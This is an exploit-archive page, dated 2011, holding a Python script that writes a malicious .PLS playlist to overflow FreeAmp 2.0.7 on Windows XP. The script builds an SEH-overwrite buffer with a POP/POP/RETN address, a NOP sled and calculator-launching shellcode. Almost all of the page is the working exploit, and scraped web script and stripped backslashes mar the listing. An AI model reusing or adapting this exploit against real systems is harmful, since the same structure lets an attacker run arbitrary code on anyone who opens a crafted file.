FreeAmp 2.0.7 PLS Buffer Overflow
Posted on 25 June 2011
#!/usr/bin/python # #[+]Exploit Title: FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit #[+]Date: 24 62011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.exploit-db.com/application/17441/ #[+]Version: 2.0.7 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # # from struct import pack import os import sys from time import sleep if os.name == "nt": os.system("cls") os.system("color 4f") os.system("Title FreeAmp .PLS File Buffer Overflow Exploit") else: os.system("clear") print ''' FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit Created By C4SS!0 G0M3S E-mail louredo_@hotmail.com<script type="text/javascript"> /* <![CDATA[ */ (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); /* ]]> */ </script> ''' sleep(2) #Shellcode WinExec "Calc.exe" shellcode = ("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" "x7fxe8x7bxca") buf = ("x41" * 893) buf += ("xebx08x90x90") buf += pack('<L',0x004027BF)#POP/POP/RETN buf += "x90" * 20 buf += shellcode buf += "x41" * (30000-len(buf)) exploit = ('''[playlist] File1=http://'''+buf+''' NumberOfEntries=1 Version=2 ''') print " [+]Creating File Exploit.pls..." sleep(1) try: f = open("Exploit.pls","wb") f.write(exploit) f.close() print " [+]File Exploit.pls Created." sleep(2) except: print " [-]Error in Create file Exploit.pls" sleep(1)
